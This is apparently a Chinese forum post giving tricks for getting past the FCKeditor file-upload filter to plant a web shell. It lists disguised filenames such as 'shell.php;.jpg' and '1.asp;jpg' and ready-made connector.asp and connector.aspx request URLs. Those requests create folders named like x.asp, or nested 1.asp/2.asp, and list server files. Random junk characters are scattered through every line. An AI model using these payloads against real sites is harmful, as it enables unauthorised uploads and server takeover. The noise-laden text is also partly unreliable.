很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg
# k1 t, r1 J$ e f' x
% k( g1 C/ {8 K# ]8 g' |提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。
) R" H: I6 T ]
' L' m0 o2 r2 V- L继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
) b/ l4 V* U8 [1 J" q4 j
+ w1 T7 U/ @- i7 C0 y+ @2 E p) L突破建立文件夹:( n J) \. g; A n" o- K/ a/ A4 l
5 @, o$ h- Z6 Y) Xeditor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp7 n! Z5 p' u- R8 P4 d ?) L
3 |7 \' \' x! }! P3 ]% s参数:9 V9 U: x" C& w% f: J
7 j- s4 n9 G) n5 s" r" \# o' X6 U. K) V
当前目录名:CurrentFolder=/qing.asp
% s" w5 _8 e% W/ j+ g! d+ c2 P- Y$ L* \4 l
新的目录名:NewFolderName=x.asp* A$ n+ m) S g3 }- ^" ]$ ]! [* M
+ G9 D, v1 _5 a) ^
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……2 u/ R9 P* } c' U6 D+ {; }
- g: ~" \; g( l. ]7 u那么 x.asp 就已经建立生成了,此方法百试百灵!4 t9 y4 x3 v8 V! c
0 o6 i) x1 J) j1 `$ z# w新建文件夹参数 x.asp,基本都能搞定。4 ]" X) ?$ u) l. J" m9 |
) y6 B1 m" w$ J3 D下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
4 O" Y9 x4 |8 t' n- a. C. u, n" V {: l6 d
aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp& D$ i0 }5 k% L( `- `5 n
) i) Z( `: R* h获取文件列表+ b7 P, h U5 ?& X, R
aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F* o8 I) c* R) o6 u, J
( w6 J w5 k0 g* H& q |